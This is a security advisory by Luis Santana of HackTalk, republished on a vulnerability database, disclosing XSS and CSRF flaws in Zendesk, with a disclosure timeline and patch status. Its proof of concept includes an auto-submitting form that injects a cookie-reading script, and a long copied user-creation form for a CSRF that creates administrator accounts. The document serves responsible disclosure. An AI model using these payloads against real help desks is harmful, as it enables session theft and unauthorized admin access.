Vulners
Lucene search
Zendesk Multiple Vulnerabilities
================================
Zendesk Multiple Vulnerabilities
================================
/????????????????????????????????\
:Zendesk Multiple Vulnerabilities :
\________________________________/
/Discovered By: \
|Luis Santana |
\________________________________/
Overview
~_?~_?~_?~_?~_?~_?~_?~_?~_?~_?~
Luis Santana of the HackTalk Security team has found multiple vulnerabilities in Zendesk.
Product Information
~_?~_?~_?~_?~_?~_?~_?~_?~_?~_?~
Product/Script: Zendesk
Affected Version:
Vulnerability Type: Multiple
Security Risk: Multiple
Vendor URL: http://zendesk.com
Product/Script Demo:
Vendor Status: Notified
Patch/Fix Status: Patches Made
Advisory Timeline: July 31st 9:34am EST - Zendesk Contacted about XSS
July 31st 12:42pm EST - Ticket passed to Security Department
July 31st 10:46pm EST - Zendesk has started producing patch. Given the go ahead to publicly disclose
July 31st 1:00am EST - Found CSRF, continuing investigation
August 1st 3:49pm EST - CSRF Patch in production
August 4th 3:51am EST - CSRF patch being rolled out
August 10th 3:36pm EST - Given the ok to post advisory publicly
Advisory URL: http://hacktalk.net/exploit/exploit.php?n=10
Product Description
~_?~_?~_?~_?~_?~_?~_?~_?~_?~_?~
Web-based customer support software with elegant ticket mnagement and a self-service customer community platform. Agile, smart and convenient.
(From http://www.zendesk.com)
Vulnerability Details
~_?~_?~_?~_?~_?~_?~_?~_?~_?~_?~
XSS -
The email address field of the anonymous_requests page is vulnerable to XSS due to lack of input sanitation. By crafting a malcious POST request an attacker is able to inject HTML, Javascript or AJAX into the anonymous_requests page.
CSRF -
Due to a lack of input sanitation many forms are vulnerable to CSRF. The most notable example is the new user creation form which allows an attacker to create a new administrative user.
Proof of Concept
~_?~_?~_?~_?~_?~_?~_?~_?~_?~_?~
XSS -
<html>
<head></head>
<body>
<form method="POST" action="https://site.com/anonymous_requests"name="explForm">
<input type=hidden name=email value='"><script>alert("I could have just stolen your cookie" + document.cookie);</script>'
</form>
<script language="Javascript">
setTimeout('explForm.submit()', 1000 * 1);
</script>
</body>
CSRF -
<form action="http://site.com/users" class="new_user" enctype="multipart/form-data" id="user-form" method="post" name="userform" onsubmit="return submitUser()">
<input id="ignore-upload-user" name="ignoreupload" type="hidden" value="0" />
<h2>Name <span class="sub">Display name used throughout the help desk.</span></h2>
<input id="user_name" name="user[name]" size="30" type="text" />
<!--<p>Display name used throughout the help desk.</p>-->
<h3>
Email
<span class="sub">Used when logging in.</span>
</h3>
<input id="user_email" name="user[email]" size="30" type="text" />
<h3>
Twitter account
</h3>
<input id="user_new_twitter_identity" name="user[new_twitter_identity]" size="30" type="text" />
<h3>Phone number <span class="sub">Optional.</span></h3>
<input id="user_phone" name="user[phone]" size="30" type="text" />
<h3>Time zone</h3>
<select id="user_time_zone" name="user[time_zone]"><option value="International Date Line West">(GMT-11:00) International Date Line West</option>
<option value="Midway Island">(GMT-11:00) Midway Island</option>
<option value="Samoa">(GMT-11:00) Samoa</option>
<option value="Hawaii">(GMT-10:00) Hawaii</option>
<option value="Alaska">(GMT-09:00) Alaska</option>
<option value="Pacific Time (US & Canada)">(GMT-08:00) Pacific Time (US & Canada)</option>
<option value="Tijuana">(GMT-08:00) Tijuana</option>
<option value="Arizona">(GMT-07:00) Arizona</option>
<option value="Chihuahua">(GMT-07:00) Chihuahua</option>
<option value="Mazatlan">(GMT-07:00) Mazatlan</option>
<option value="Mountain Time (US & Canada)">(GMT-07:00) Mountain Time (US & Canada)</option>
<option value="Central America">(GMT-06:00) Central America</option>
<option value="Central Time (US & Canada)">(GMT-06:00) Central Time (US & Canada)</option>
<option value="Guadalajara">(GMT-06:00) Guadalajara</option>
<option value="Mexico City">(GMT-06:00) Mexico City</option>
<option value="Monterrey">(GMT-06:00) Monterrey</option>
<option value="Saskatchewan">(GMT-06:00) Saskatchewan</option>
<option value="Bogota" selected="selected">(GMT-05:00) Bogota</option>
<option value="Eastern Time (US & Canada)">(GMT-05:00) Eastern Time (US & Canada)</option>
<option value="Indiana (East)">(GMT-05:00) Indiana (East)</option>
<option value="Lima">(GMT-05:00) Lima</option>
<option value="Quito">(GMT-05:00) Quito</option>
<option value="Caracas">(GMT-04:30) Caracas</option>
<option value="Atlantic Time (Canada)">(GMT-04:00) Atlantic Time (Canada)</option>
<option value="La Paz">(GMT-04:00) La Paz</option>
<option value="Santiago">(GMT-04:00) Santiago</option>
<option value="Newfoundland">(GMT-03:30) Newfoundland</option>
<option value="Brasilia">(GMT-03:00) Brasilia</option>
<option value="Buenos Aires">(GMT-03:00) Buenos Aires</option>
<option value="Georgetown">(GMT-03:00) Georgetown</option>
<option value="Greenland">(GMT-03:00) Greenland</option>
<option value="Mid-Atlantic">(GMT-02:00) Mid-Atlantic</option>
<option value="Azores">(GMT-01:00) Azores</option>
<option value="Cape Verde Is.">(GMT-01:00) Cape Verde Is.</option>
<option value="Casablanca">(GMT+00:00) Casablanca</option>
<option value="Dublin">(GMT+00:00) Dublin</option>
<option value="Edinburgh">(GMT+00:00) Edinburgh</option>
<option value="Lisbon">(GMT+00:00) Lisbon</option>
<option value="London">(GMT+00:00) London</option>
<option value="Monrovia">(GMT+00:00) Monrovia</option>
<option value="UTC">(GMT+00:00) UTC</option>
<option value="Amsterdam">(GMT+01:00) Amsterdam</option>
<option value="Belgrade">(GMT+01:00) Belgrade</option>
<option value="Berlin">(GMT+01:00) Berlin</option>
<option value="Bern">(GMT+01:00) Bern</option>
<option value="Bratislava">(GMT+01:00) Bratislava</option>
<option value="Brussels">(GMT+01:00) Brussels</option>
<option value="Budapest">(GMT+01:00) Budapest</option>
<option value="Copenhagen">(GMT+01:00) Copenhagen</option>
<option value="Ljubljana">(GMT+01:00) Ljubljana</option>
<option value="Madrid">(GMT+01:00) Madrid</option>
<option value="Paris">(GMT+01:00) Paris</option>
<option value="Prague">(GMT+01:00) Prague</option>
<option value="Rome">(GMT+01:00) Rome</option>
<option value="Sarajevo">(GMT+01:00) Sarajevo</option>
<option value="Skopje">(GMT+01:00) Skopje</option>
<option value="Stockholm">(GMT+01:00) Stockholm</option>
<option value="Vienna">(GMT+01:00) Vienna</option>
<option value="Warsaw">(GMT+01:00) Warsaw</option>
<option value="West Central Africa">(GMT+01:00) West Central Africa</option>
<option value="Zagreb">(GMT+01:00) Zagreb</option>
<option value="Athens">(GMT+02:00) Athens</option>
<option value="Bucharest">(GMT+02:00) Bucharest</option>
<option value="Cairo">(GMT+02:00) Cairo</option>
<option value="Harare">(GMT+02:00) Harare</option>
<option value="Helsinki">(GMT+02:00) Helsinki</option>
<option value="Istanbul">(GMT+02:00) Istanbul</option>
<option value="Jerusalem">(GMT+02:00) Jerusalem</option>
<option value="Kyev">(GMT+02:00) Kyev</option>
<option value="Minsk">(GMT+02:00) Minsk</option>
<option value="Pretoria">(GMT+02:00) Pretoria</option>
<option value="Riga">(GMT+02:00) Riga</option>
<option value="Sofia">(GMT+02:00) Sofia</option>
<option value="Tallinn">(GMT+02:00) Tallinn</option>
<option value="Vilnius">(GMT+02:00) Vilnius</option>
<option value="Baghdad">(GMT+03:00) Baghdad</option>
<option value="Kuwait">(GMT+03:00) Kuwait</option>
<option value="Moscow">(GMT+03:00) Moscow</option>
<option value="Nairobi">(GMT+03:00) Nairobi</option>
<option value="Riyadh">(GMT+03:00) Riyadh</option>
<option value="St. Petersburg">(GMT+03:00) St. Petersburg</option>
<option value="Volgograd">(GMT+03:00) Volgograd</option>
<option value="Tehran">(GMT+03:30) Tehran</option>
<option value="Abu Dhabi">(GMT+04:00) Abu Dhabi</option>
<option value="Baku">(GMT+04:00) Baku</option>
<option value="Muscat">(GMT+04:00) Muscat</option>
<option value="Tbilisi">(GMT+04:00) Tbilisi</option>
<option value="Yerevan">(GMT+04:00) Yerevan</option>
<option value="Kabul">(GMT+04:30) Kabul</option>
<option value="Ekaterinburg">(GMT+05:00) Ekaterinburg</option>
<option value="Islamabad">(GMT+05:00) Islamabad</option>
<option value="Karachi">(GMT+05:00) Karachi</option>
<option value="Tashkent">(GMT+05:00) Tashkent</option>
<option value="Chennai">(GMT+05:30) Chennai</option>
<option value="Kolkata">(GMT+05:30) Kolkata</option>
<option value="Mumbai">(GMT+05:30) Mumbai</option>
<option value="New Delhi">(GMT+05:30) New Delhi</option>
<option value="Sri Jayawardenepura">(GMT+05:30) Sri Jayawardenepura</option>
<option value="Kathmandu">(GMT+05:45) Kathmandu</option>
<option value="Almaty">(GMT+06:00) Almaty</option>
<option value="Astana">(GMT+06:00) Astana</option>
<option value="Dhaka">(GMT+06:00) Dhaka</option>
<option value="Novosibirsk">(GMT+06:00) Novosibirsk</option>
<option value="Rangoon">(GMT+06:30) Rangoon</option>
<option value="Bangkok">(GMT+07:00) Bangkok</option>
<option value="Hanoi">(GMT+07:00) Hanoi</option>
<option value="Jakarta">(GMT+07:00) Jakarta</option>
<option value="Krasnoyarsk">(GMT+07:00) Krasnoyarsk</option>
<option value="Beijing">(GMT+08:00) Beijing</option>
<option value="Chongqing">(GMT+08:00) Chongqing</option>
<option value="Hong Kong">(GMT+08:00) Hong Kong</option>
<option value="Irkutsk">(GMT+08:00) Irkutsk</option>
<option value="Kuala Lumpur">(GMT+08:00) Kuala Lumpur</option>
<option value="Perth">(GMT+08:00) Perth</option>
<option value="Singapore">(GMT+08:00) Singapore</option>
<option value="Taipei">(GMT+08:00) Taipei</option>
<option value="Ulaan Bataar">(GMT+08:00) Ulaan Bataar</option>
<option value="Urumqi">(GMT+08:00) Urumqi</option>
<option value="Osaka">(GMT+09:00) Osaka</option>
<option value="Sapporo">(GMT+09:00) Sapporo</option>
<option value="Seoul">(GMT+09:00) Seoul</option>
<option value="Tokyo">(GMT+09:00) Tokyo</option>
<option value="Yakutsk">(GMT+09:00) Yakutsk</option>
<option value="Adelaide">(GMT+09:30) Adelaide</option>
<option value="Darwin">(GMT+09:30) Darwin</option>
<option value="Brisbane">(GMT+10:00) Brisbane</option>
<option value="Canberra">(GMT+10:00) Canberra</option>
<option value="Guam">(GMT+10:00) Guam</option>
<option value="Hobart">(GMT+10:00) Hobart</option>
<option value="Melbourne">(GMT+10:00) Melbourne</option>
<option value="Port Moresby">(GMT+10:00) Port Moresby</option>
<option value="Sydney">(GMT+10:00) Sydney</option>
<option value="Vladivostok">(GMT+10:00) Vladivostok</option>
<option value="Magadan">(GMT+11:00) Magadan</option>
<option value="New Caledonia">(GMT+11:00) New Caledonia</option>
<option value="Solomon Is.">(GMT+11:00) Solomon Is.</option>
<option value="Auckland">(GMT+12:00) Auckland</option>
<option value="Fiji">(GMT+12:00) Fiji</option>
<option value="Kamchatka">(GMT+12:00) Kamchatka</option>
<option value="Marshall Is.">(GMT+12:00) Marshall Is.</option>
<option value="Wellington">(GMT+12:00) Wellington</option>
<option value="Nuku'alofa">(GMT+13:00) Nuku'alofa</option><option value="" disabled="disabled">-------------</option>
</select>
<a name="photo">
<h3>Photo <span class="sub">An optional smiling face. For the best results, upload a photo with equal length and height.</span></h3>
<input id="photo_uploaded_data" name="photo[uploaded_data]" type="file" />
</a>
<h3>Detailed information</h3>
<textarea cols="60" id="user_details" name="user[details]" rows="5"></textarea>
<p>Optional detailed information concerning this user, e.g. an address. This information is visible to agents only, never to end-users.</p>
<h3>Notes</h3>
<textarea cols="60" id="user_notes" name="user[notes]" rows="5"></textarea>
<p>Optional notes concerning this user. Notes can also be added/edited for a requester directly on the ticket form page.<br/>Notes are visible to agents only, never to any end-user.</p>
<div id="organization-block">
<h3>Organization</h3>
<select id="user_organization_id" name="user[organization_id]" style="width:auto;"><option value="">(None)</option>
<option value="237057">HackTalk Security</option></select>
<p>Leave blank to select default organization according to organization mappings.</p>
</div>
<h3>Role - privileges granted to this user</h3>
<h4>
<input checked="checked" id="user-radio" name="user[roles]" onclick="checkAgent();" type="radio" value="0" />
End-user.
<span class="sub">Submits support tickets to the help desk.</span>
</h4>
<div id="end_user_block" class="indented_option" style="">
<h4>Has access to:</h4>
<p><input checked="checked" id="user_restriction_id_4" name="user[restriction_id]" type="radio" value="4" /> Tickets requested by user only</p>
<p><input id="user_restriction_id_2" name="user[restriction_id]" type="radio" value="2" /> Tickets from user's organization</p>
<p>Note - if the user belongs to a shared organization, then the user always has access to tickets in the organization.</p>
</div>
<h4>
<input id="user_roles_4" name="user[roles]" onclick="checkAgent();" type="radio" value="4" />
Agent.
<span class="sub">Help desk operator. Receives and resolves tickets from end-users.</span>
</h4>
<div id="agent_block" class="indented_option" style="display:none;">
<div id="agent_groups"></div>
<h4>Has access to:</h4>
<p><input id="user_restriction_id_0" name="user[restriction_id]" type="radio" value="0" /> All tickets <span class="sub">(can also add, modify and assume end-users)</span></p>
<p>
<input type="radio" value="2" name="user[restriction_id]" id="snov"/>
Tickets requested by users in this agent's organization <span class="sub">(also can't see forums restricted to other organizations)</span>
</p>
<p><input id="user_restriction_id_3" name="user[restriction_id]" type="radio" value="3" /> Tickets assigned to this agent only</p>
<h4>Can add ticket comments that are:</h4>
<p>
<label class="option"><input checked="checked" class="radio" id="user_is_private_comments_only_false" name="user[is_private_comments_only]" type="radio" value="false" /> Public or private</label>
<label class="option"><input class="radio" id="user_is_private_comments_only_true" name="user[is_private_comments_only]" type="radio" value="true" /> Private only (viewable only by other agents)</label>
</p>
<h4>Can moderate (edit, delete and reorder) topics in forums:</h4>
<p>
<label class="option"><input class="radio" id="user_is_moderator_true" name="user[is_moderator]" type="radio" value="true" /> Yes</label>
<label class="option"><input checked="checked" class="radio" id="user_is_moderator_false" name="user[is_moderator]" type="radio" value="false" /> No</label>
</p>
</div>
<h4>
<input id="user_roles_2" name="user[roles]" onclick="checkAgent();" type="radio" value="2" />
Admin.
<span class="sub">Manages the help desk with regard to rules, users, organizations, groups and SLA's. Has access to all tickets.</span>
<div id="admin_groups" class="indented_option"></div>
</h4>
<div class="action">
<input class="buttonsubmit" id="submit-button" name="commit" type="submit" value="Create" />
</div>
Patch/Fix Suggestion(s)
~_?~_?~_?~_?~_?~_?~_?~_?~_?~_?~
Upgrade to the latest version of Zendesk as they have released patches for these vulnerabilities.
Security Risk
~_?~_?~_?~_?~_?~_?~_?~_?~_?~_?~
XSS - Low
CSRF - Mid
# 0day.today [2018-01-03] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Aug 2010 00:00Current
7.1High risk
Vulners AI Score7.1